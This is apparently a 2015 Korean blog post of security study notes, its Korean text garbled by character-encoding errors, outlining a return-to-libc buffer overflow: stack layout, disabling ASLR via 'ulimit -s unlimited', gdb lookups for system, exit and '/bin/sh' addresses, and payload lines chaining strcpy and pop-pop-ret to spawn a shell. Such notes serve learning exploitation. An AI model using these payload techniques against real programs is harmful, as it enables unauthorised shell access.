Security Study/System

system 1์ผ์ฐจ

๐“›๐“พ๐“ฌ๐“ฎ๐“ฝ๐“ฎ_๐“ข๐“ฝ๐“ฎ๐“ต๐“ต๐“ช 2015. 9. 12.
728x90
๋ฐ˜์‘ํ˜•

buf[248] + sfp[4] + ret


ulimit -s unlimited //์Šคํƒํฌ๊ธฐ๋ฅผ ๋ฌดํ•œ์ •์œผ๋กœ ๋Š˜๋ ค ASLR์ด ์ ์šฉ์•ˆ๋จ

system,execve - ebp+8์œ„์น˜์—์žˆ๋Š”๊ฒƒ์„ ์ธ์ž๋กœ๋ฐ›์Œ


buf[248] + sfp [4] + ์กฐ์ž‘(system) + AAAA + /bin/sh
 - system("/bin/sh")



b main
r 1

p system - system์ฃผ์†Œ ๊ตฌํ•˜๊ธฐ
p exit - exit๊ตฌํ•˜๊ธฐ
find &system,+9999999,"/bin/sh" - /bin/sh์ฃผ์†Œ ๊ตฌํ•˜๊ธฐ

./filename $(python -c 'print "A"*๋ฒ„ํผ+sfp + system + exit + /bin/sh

strcpy(bss,\x80asda)
strcpy(bss,"b")

./filename buf+sfp + strcpy + poppopret + bss + / + strcpy + poppopret + bss + b
\x00... + system + AAAA + bss1


728x90
๋ฐ˜์‘ํ˜•

'Security Study > System' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

system /bin/sh ์ฃผ์†Œ ์ฐพ๊ธฐ  (0) 2015.09.15
system 2  (0) 2015.09.13
system shellcode  (0) 2015.09.10
BOF(buffer overflow)  (0) 2015.09.03
์นด์นด์˜คํ†ก ๋น„๋ฐ€๋Œ€ํ™” ๋ถ„์„  (0) 2015.09.03

๋Œ“๊ธ€